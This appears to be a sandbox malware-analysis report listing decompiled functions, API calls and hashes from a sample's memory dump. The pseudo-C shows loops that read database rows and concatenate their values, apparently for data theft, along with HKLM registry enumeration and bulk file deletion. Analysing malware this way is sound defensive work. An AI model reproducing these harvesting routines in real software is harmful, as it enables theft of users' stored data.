Opcode ID: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction ID: bc28ad3244c6047704c045b0bde55bc756140ce9c37c63802fb4846e29daee7b
Opcode Fuzzy Hash: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction Fuzzy Hash: 2B0125B0D00208ABDB00DBE4DD49BEEB7B8FF08704F108958F605AB280D7B99A10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02D288A0, Relevance: 12.1, APIs: 8, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D288CF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D2891F
RtlAllocateHeap.NTDLL(00000000), ref: 02D28926
lstrcat.KERNEL32(?,?), ref: 02D28989
lstrcat.KERNEL32(?,00418BC4), ref: 02D2899B
lstrcat.KERNEL32(?,?), ref: 02D289AF
lstrcat.KERNEL32(?,00418BC0), ref: 02D289C1
lstrlen.KERNEL32(?), ref: 02D289D3

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 1119712f637d9eb64d062cc267114afa9ce115c682cd0cc618dc5df66b8733dd
Instruction ID: b47eba66e6183940289a6e4c314dffba7a2084b4807eb95fc1b87b78c516abc5
Opcode Fuzzy Hash: 1119712f637d9eb64d062cc267114afa9ce115c682cd0cc618dc5df66b8733dd
Instruction Fuzzy Hash: 7A4183B1900118ABCB14EBA4DD4AFDA77B8AF48704F008594F709D7251DB35EEA1CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D29650, Relevance: 12.1, APIs: 8, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D2967F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D296D5
RtlAllocateHeap.NTDLL(00000000), ref: 02D296DC
lstrcat.KERNEL32(?,?), ref: 02D2973F
lstrcat.KERNEL32(?,004191EC), ref: 02D29751
lstrcat.KERNEL32(?,?), ref: 02D29765
lstrcat.KERNEL32(?,00418BC4), ref: 02D29777
lstrlen.KERNEL32(?), ref: 02D29789

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: b84b80bc3ef8a66e1ec50053915ad1ece2d15714b502d0903898013e999a1153
Instruction ID: ede3b3be472ca2232a5b668e881fb82c5d393f3419ef431ab974b9dc97a5d852
Opcode Fuzzy Hash: b84b80bc3ef8a66e1ec50053915ad1ece2d15714b502d0903898013e999a1153
Instruction Fuzzy Hash: 0A41B3B1A00118ABCB14EFA4DD4AFEA77B8AF08705F008594F70993241D675DEA0CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D283A0, Relevance: 12.1, APIs: 8, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D283CF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D28425
RtlAllocateHeap.NTDLL(00000000), ref: 02D2842C
lstrcat.KERNEL32(?,?), ref: 02D2848F
lstrcat.KERNEL32(?,004191EC), ref: 02D284A1
lstrcat.KERNEL32(?,?), ref: 02D284B5
lstrcat.KERNEL32(?,00418BC4), ref: 02D284C7
lstrlen.KERNEL32(?), ref: 02D284D9

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: d8e0212f09cecbd233b21caa2a70ce8ec35c05bdcc88d7923fb4c376bc824f5d
Instruction ID: f8a0495bc23aacebf1c0076ba51a593f5b14b7468595c45de0a309bf9fe15ff0
Opcode Fuzzy Hash: d8e0212f09cecbd233b21caa2a70ce8ec35c05bdcc88d7923fb4c376bc824f5d
Instruction Fuzzy Hash: 0F41C7B1A00118ABCB14EBA4DD49FDA73B9EF08704F008594F709D3241D675EEA0CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00408650, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408650(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v8;
				char _v276;
				char _v280;
				char _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v276, 0x104);
				_t30 =  *0x41a418; // 0x2e4b1c0
				wsprintfA( &_v276, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v8);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a790; // 0x2e4b2a0
					_t35 =  *0x41a7e8(_v8, _t67, 0xffffffff,  &_v280, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v280);
						return  *0x41a834(_v8);
					}
					_v284 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v280);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v280, 0);
						_t48 =  *0x41a820(_v280, 1);
						_t76 = _t79 + 0x10;
						_v292 = _t48;
						 *0x41aa24(_v284, _v288);
						 *0x41aa24(_v284, "\n");
						 *0x41aa24(_v284, _v292);
						 *0x41aa24(_v284, "\n\n");
					}
					E004137E0(_a24,  &_v276, _v284,  *0x41a908(_v284));
					_t76 = _t79 + 0x10;
					E0040B720( &_v284, 4);
					goto L6;
				}
				return _t33;
			}

0x00408665
0x00408672
0x0040867f
0x00408690
0x00408696
0x0040869b
0x004086ac
0x004086b7
0x004086bd
0x004086c2
0x004087b2
0x004087b9
0x00000000
0x004087cc
0x004086dc
0x004086e2
0x004086e9
0x004086ef
0x004086f5
0x00000000
0x00000000
0x0040870d
0x0040871c
0x00408722
0x00408725
0x00408739
0x0040874b
0x0040875f
0x00408771
0x00408771
0x0040879c
0x004087a1
0x004087ad
0x00000000
0x004087ad
0x004087d2

APIs

wsprintfA.USER32 ref: 0040867F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004086CF
RtlAllocateHeap.NTDLL(00000000), ref: 004086D6
lstrcat.KERNEL32(?,?), ref: 00408739
lstrcat.KERNEL32(?,00418BC4), ref: 0040874B
lstrcat.KERNEL32(?,?), ref: 0040875F
lstrcat.KERNEL32(?,00418BC0), ref: 00408771
lstrlen.KERNEL32(?), ref: 00408783

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: cbaa3a57402c93d3f6ac8d8f06c7d0ef17fa834f40e1eb2d1f60f83834225a72
Instruction ID: 955311191cc75421edc53ced7400f0f4475059767564ca96251eab490a2998f9
Opcode Fuzzy Hash: cbaa3a57402c93d3f6ac8d8f06c7d0ef17fa834f40e1eb2d1f60f83834225a72
Instruction Fuzzy Hash: 5F41A9B1900108ABCB14DBA4DD46FDA7778AF4C705F0085A9F70997141DB35DAA1CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409400, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409400(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v268, 0x104);
				_t30 =  *0x41a40c; // 0x2e4afe0
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v272);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a08c; // 0x2e4b4d0
					_t35 =  *0x41a7e8(_v272, _t67, 0xffffffff,  &_v276, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v276);
						return  *0x41a834(_v272);
					}
					_v280 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v276, 0);
						_t48 =  *0x41a820(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x41aa24(_v280, _v288);
						 *0x41aa24(_v280, "\t");
						 *0x41aa24(_v280, _v284);
						 *0x41aa24(_v280, "\n");
					}
					E004137E0(_a16,  &_v268, _v280,  *0x41a908(_v280));
					_t76 = _t79 + 0x10;
					E0040B720( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00409415
0x00409422
0x0040942f
0x00409443
0x00409449
0x0040944e
0x0040945f
0x0040946d
0x00409473
0x00409478
0x00409568
0x0040956f
0x00000000
0x00409585
0x00409492
0x00409498
0x0040949f
0x004094a5
0x004094ab
0x00000000
0x00000000
0x004094c3
0x004094d2
0x004094d8
0x004094db
0x004094ef
0x00409501
0x00409515
0x00409527
0x00409527
0x00409552
0x00409557
0x00409563
0x00000000
0x00409563
0x0040958b

APIs

wsprintfA.USER32 ref: 0040942F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00409485
RtlAllocateHeap.NTDLL(00000000), ref: 0040948C
lstrcat.KERNEL32(?,?), ref: 004094EF
lstrcat.KERNEL32(?,004191EC), ref: 00409501
lstrcat.KERNEL32(?,?), ref: 00409515
lstrcat.KERNEL32(?,00418BC4), ref: 00409527
lstrlen.KERNEL32(?), ref: 00409539

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 73554b27680e441b7f146b6b5ae22a03ed6891bd5a46cf62418f090caae84141
Instruction ID: 73f73464c9cdda0f85a8cd32dc3c754c459267de9915a2913d06030346bf418a
Opcode Fuzzy Hash: 73554b27680e441b7f146b6b5ae22a03ed6891bd5a46cf62418f090caae84141
Instruction Fuzzy Hash: B141BAB1900108ABCB14DFA4DD4AFDA77B8AF48705F0085A9F709D7141D675DEA0CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00408150, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408150(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v268, 0x104);
				_t30 =  *0x41a40c; // 0x2e4afe0
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v272);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a6ec; // 0x2e48f00
					_t35 =  *0x41a7e8(_v272, _t67, 0xffffffff,  &_v276, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v276);
						return  *0x41a834(_v272);
					}
					_v280 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v276, 0);
						_t48 =  *0x41a820(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x41aa24(_v280, _v288);
						 *0x41aa24(_v280, "\t");
						 *0x41aa24(_v280, _v284);
						 *0x41aa24(_v280, "\n");
					}
					E004137E0(_a24,  &_v268, _v280,  *0x41a908(_v280));
					_t76 = _t79 + 0x10;
					E0040B720( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00408165
0x00408172
0x0040817f
0x00408193
0x00408199
0x0040819e
0x004081af
0x004081bd
0x004081c3
0x004081c8
0x004082b8
0x004082bf
0x00000000
0x004082d5
0x004081e2
0x004081e8
0x004081ef
0x004081f5
0x004081fb
0x00000000
0x00000000
0x00408213
0x00408222
0x00408228
0x0040822b
0x0040823f
0x00408251
0x00408265
0x00408277
0x00408277
0x004082a2
0x004082a7
0x004082b3
0x00000000
0x004082b3
0x004082db

APIs

wsprintfA.USER32 ref: 0040817F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004081D5
RtlAllocateHeap.NTDLL(00000000), ref: 004081DC
lstrcat.KERNEL32(?,?), ref: 0040823F
lstrcat.KERNEL32(?,004191EC), ref: 00408251
lstrcat.KERNEL32(?,?), ref: 00408265
lstrcat.KERNEL32(?,00418BC4), ref: 00408277
lstrlen.KERNEL32(?), ref: 00408289

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 857a99269bea2190ef1d5ef6c68e25cbade465b3303be24ebff5005b65543a5f
Instruction ID: b2019dcf8292433c89953b96a3eab70520c34c161fc81907ed19fb7541bb8629
Opcode Fuzzy Hash: 857a99269bea2190ef1d5ef6c68e25cbade465b3303be24ebff5005b65543a5f
Instruction Fuzzy Hash: 5141ABB19001089BCB14DFA4DD46FDA7778AF48705F0085A9F709D7141DA75DEA0CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B39D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040B39D() {
				long _t36;
				char* _t66;
				intOrPtr _t73;
				char* _t76;
				void* _t81;

				L0:
				while(1) {
					L0:
					 *(_t81 - 0xc1c) =  *(_t81 - 0xc1c) + 1;
					if( *((intOrPtr*)(_t81 - 0x814)) != 0) {
						break;
					}
					L2:
					 *(_t81 - 0x818) = 0x400;
					 *((intOrPtr*)(_t81 - 0x814)) = RegEnumKeyExA( *(_t81 - 0x810),  *(_t81 - 0xc1c), _t81 - 0x408, _t81 - 0x818, 0, 0, 0, 0);
					if( *((intOrPtr*)(_t81 - 0x814)) != 0) {
						L11:
						continue;
					} else {
						L3:
						_push(_t81 - 0x408);
						_t73 =  *0x41a230; // 0x2e2e668
						_push(_t73);
						wsprintfA(_t81 - 0x808, "%s\%s");
						if(RegOpenKeyExA(0x80000002, _t81 - 0x808, 0, 0x20019, _t81 - 0x80c) == 0) {
							L5:
							 *(_t81 - 0x818) = 0x400;
							_t76 =  *0x41a71c; // 0x2e4bb60
							if(RegQueryValueExA( *(_t81 - 0x80c), _t76, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818) == 0) {
								L6:
								_push(_t81 - 0xc18);
								if( *0x41a908() > 1) {
									L7:
									 *0x41aa24( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									 *(_t81 - 0x818) = 0x400;
									_t66 =  *0x41a450; // 0x2e4bcf8
									if(RegQueryValueExA( *(_t81 - 0x80c), _t66, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818) == 0) {
										 *0x41aa24( *((intOrPtr*)(_t81 + 8)), " ");
										 *0x41aa24( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									}
									L9:
									 *0x41aa24( *((intOrPtr*)(_t81 + 8)), "\n");
								}
							}
							L10:
							RegCloseKey( *(_t81 - 0x80c));
							goto L11;
						} else {
							L4:
							RegCloseKey( *(_t81 - 0x80c));
							_t36 = RegCloseKey( *(_t81 - 0x810));
						}
					}
					L13:
					return _t36;
					L14:
				}
				L12:
				_t36 = RegCloseKey( *(_t81 - 0x810));
				goto L13;
			}

0x0040b39d
0x0040b39d
0x0040b39d
0x0040b3a6
0x0040b3b3
0x00000000
0x00000000
0x0040b3b9
0x0040b3b9
0x0040b3ed
0x0040b3fa
0x0040b535
0x00000000
0x0040b400
0x0040b400
0x0040b406
0x0040b407
0x0040b40d
0x0040b41a
0x0040b445
0x0040b466
0x0040b466
0x0040b484
0x0040b49a
0x0040b4a0
0x0040b4a6
0x0040b4b0
0x0040b4b2
0x0040b4bd
0x0040b4c3
0x0040b4e1
0x0040b4f7
0x0040b502
0x0040b513
0x0040b513
0x0040b519
0x0040b522
0x0040b522
0x0040b4b0
0x0040b528
0x0040b52f
0x00000000
0x0040b447
0x0040b447
0x0040b44e
0x0040b45b
0x0040b45b
0x0040b445
0x0040b547
0x0040b54a
0x00000000
0x0040b54a
0x0040b53a
0x0040b541
0x00000000

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 0040B3E7
wsprintfA.USER32 ref: 0040B41A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000), ref: 0040B43D
RegCloseKey.ADVAPI32(00000000), ref: 0040B44E
RegCloseKey.ADVAPI32(00000000), ref: 0040B45B
RegQueryValueExA.ADVAPI32(00000000,02E4BB60,00000000,000F003F,?,00000400), ref: 0040B492
lstrlen.KERNEL32(?), ref: 0040B4A7
lstrcat.KERNEL32(?,?), ref: 0040B4BD
RegQueryValueExA.ADVAPI32(00000000,02E4BCF8,00000000,000F003F,?,00000400), ref: 0040B4EF
lstrcat.KERNEL32(?,00419238), ref: 0040B502
lstrcat.KERNEL32(?,?), ref: 0040B513
lstrcat.KERNEL32(?,00418BC4), ref: 0040B522
RegCloseKey.ADVAPI32(00000000), ref: 0040B52F
RegCloseKey.ADVAPI32(00000000), ref: 0040B541

Strings

%s\%s, xrefs: 0040B40E

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Closelstrcat$QueryValue$EnumOpenlstrlenwsprintf
String ID: %s\%s
API String ID: 199769609-4073750446
Opcode ID: a4012638aad7033c914fdd1a0f1ca3e258b17949767a5016186a6d4b83d2670b
Instruction ID: 9546bb00d88ab29d98338f3d9e51bb631a883dd56483db4c703a054c40f4693a
Opcode Fuzzy Hash: a4012638aad7033c914fdd1a0f1ca3e258b17949767a5016186a6d4b83d2670b
Instruction Fuzzy Hash: 86110DB1901218ABDB20CB50DD45FE9B3B8FB48704F00C5E9A249A6181DB745AD6CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D26030, Relevance: 10.5, APIs: 7, Instructions: 25fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(0041A6A4), ref: 02D26039
DeleteFileA.KERNEL32(0041A2F0), ref: 02D26046
DeleteFileA.KERNEL32(0041A650), ref: 02D26053
DeleteFileA.KERNEL32(0041A220), ref: 02D2605F
DeleteFileA.KERNEL32(0041A6CC), ref: 02D2606C
DeleteFileA.KERNEL32(0041A4A8), ref: 02D26079
DeleteFileA.KERNEL32(0041A700), ref: 02D26085

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction ID: 53f7d35bc311ab0ea18b8a2534d9d90475545ede5d55a6c2cac6028fe6962c5d
Opcode Fuzzy Hash: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction Fuzzy Hash: D7F014F95232009BC7049BA4ED4C8A637A9B7CC621305C928B50683225CB39E5608B7B

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE0, Relevance: 10.5, APIs: 7, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DE0() {
				CHAR* _t1;
				CHAR* _t5;
				CHAR* _t9;
				CHAR* _t11;
				CHAR* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t1 =  *0x41a6a4; // 0x2e493b0
				DeleteFileA(_t1);
				_t11 =  *0x41a2f0; // 0x2e49608
				DeleteFileA(_t11);
				_t13 =  *0x41a650; // 0x2e491d0
				DeleteFileA(_t13);
				_t5 =  *0x41a220; // 0x2e491f8
				DeleteFileA(_t5);
				_t12 =  *0x41a6cc; // 0x2e332e8
				DeleteFileA(_t12);
				_t14 =  *0x41a4a8; // 0x2e49220
				DeleteFileA(_t14);
				_t9 =  *0x41a700; // 0x2e49298
				return DeleteFileA(_t9);
			}

0x00405de3
0x00405de9
0x00405def
0x00405df6
0x00405dfc
0x00405e03
0x00405e09
0x00405e0f
0x00405e15
0x00405e1c
0x00405e22
0x00405e29
0x00405e2f
0x00405e3c

APIs

DeleteFileA.KERNEL32(02E493B0,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405DE9
DeleteFileA.KERNEL32(02E49608,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405DF6
DeleteFileA.KERNEL32(02E491D0,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E03
DeleteFileA.KERNEL32(02E491F8,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E0F
DeleteFileA.KERNEL32(02E332E8,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E1C
DeleteFileA.KERNEL32(02E49220,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E29
DeleteFileA.KERNEL32(02E49298,?,004068D3,?,00000004,?,00000004,?,00000004,?,00001388,?,00000104), ref: 00405E35

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction ID: 53f7d35bc311ab0ea18b8a2534d9d90475545ede5d55a6c2cac6028fe6962c5d
Opcode Fuzzy Hash: ff69e4b31bc1838d1b169166c51fd268a0e82c38cd1b180b4cede6b8889026cc
Instruction Fuzzy Hash: D7F014F95232009BC7049BA4ED4C8A637A9B7CC621305C928B50683225CB39E5608B7B

Uniqueness

Uniqueness Score: -1.00%

Function 02D297E0, Relevance: 9.1, APIs: 6, Instructions: 94memorystringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D2980F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D2986B
RtlAllocateHeap.NTDLL(00000000), ref: 02D29872
lstrcat.KERNEL32(?,?), ref: 02D298B9
lstrcat.KERNEL32(?,00418BC4), ref: 02D298CB
lstrlen.KERNEL32(?), ref: 02D298DA

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: 3279a0d31ac6cb8fdc7aad023880eae878c5ba0ec85adfaa004ecd867f618224
Instruction ID: 7f049567e360093c5e049395fdbb117abd1b06a663200c65066f63edff32863c
Opcode Fuzzy Hash: 3279a0d31ac6cb8fdc7aad023880eae878c5ba0ec85adfaa004ecd867f618224
Instruction Fuzzy Hash: 463161B1900118ABCB14EBA8DD45FDA73B9AF48304F0085A4F70997251D635DEA5CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00409590, Relevance: 9.1, APIs: 6, Instructions: 94
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00409590(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				CHAR* _t27;
				void* _t30;
				void* _t32;
				void* _t38;
				intOrPtr _t44;
				intOrPtr _t58;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				E0040B720( &_v276, 0x104);
				_t27 =  *0x41a07c; // 0x2e4b000
				wsprintfA( &_v276, _t27, _a12, _a8);
				_t58 =  *0x41a294; // 0x2e49338
				_v280 = _t58;
				_t30 =  *0x41a830(_a4,  &_v8);
				_t66 = _t64 + 0x18;
				if(_t30 == 0) {
					_t32 =  *0x41a7e8(_v8, _v280, 0xffffffff,  &_v284, 0);
					_t67 = _t66 + 0x14;
					if(_t32 != 0) {
						L6:
						 *0x41a808(_v284);
						return  *0x41a834(_v8);
					}
					_v288 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t38 =  *0x41a804(_v284);
						_t70 = _t67 + 4;
						if(_t38 != 0x64) {
							break;
						}
						_t44 =  *0x41a820(_v284, 0);
						_t67 = _t70 + 8;
						_v292 = _t44;
						 *0x41aa24(_v288, _v292);
						 *0x41aa24(_v288, "\n");
					}
					E004137E0(_a16,  &_v276, _v288,  *0x41a908(_v288));
					_t67 = _t70 + 0x10;
					E0040B720( &_v288, 4);
					goto L6;
				}
				return _t30;
			}

0x004095a5
0x004095b2
0x004095bf
0x004095c8
0x004095ce
0x004095dc
0x004095e2
0x004095e7
0x00409603
0x00409609
0x0040960e
0x004096b9
0x004096c0
0x00000000
0x004096d3
0x00409628
0x0040962e
0x00409635
0x0040963b
0x00409641
0x00000000
0x00000000
0x0040964c
0x00409652
0x00409655
0x00409669
0x0040967b
0x0040967b
0x004096a3
0x004096a8
0x004096b4
0x00000000
0x004096b4
0x004096d9

APIs

wsprintfA.USER32 ref: 004095BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040961B
RtlAllocateHeap.NTDLL(00000000), ref: 00409622
lstrcat.KERNEL32(?,?), ref: 00409669
lstrcat.KERNEL32(?,00418BC4), ref: 0040967B
lstrlen.KERNEL32(?), ref: 0040968A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: 118ae59d0f25a22a12b371e08b370f69fa651aeb9a5a1d3569fc809063f8c249
Instruction ID: 0f4305f0ea4e8f12541be8dfce34b0e085d7d14125619b5af487afca8afb3160
Opcode Fuzzy Hash: 118ae59d0f25a22a12b371e08b370f69fa651aeb9a5a1d3569fc809063f8c249
Instruction Fuzzy Hash: 263186B1900108ABCB14DFA4DD46FDA73B8AF4C704F0085A9F70997281D635DEA1CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 02D28760, Relevance: 9.1, APIs: 6, Instructions: 92memorystringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D2878F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D287DF
RtlAllocateHeap.NTDLL(00000000), ref: 02D287E6
lstrcat.KERNEL32(?,?), ref: 02D2882D
lstrcat.KERNEL32(?,00418BC4), ref: 02D2883F
lstrlen.KERNEL32(?), ref: 02D2884E

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: a067fa9aa66848bc42d69728368930e1c48be6e022443f56fa634f8f40c33e55
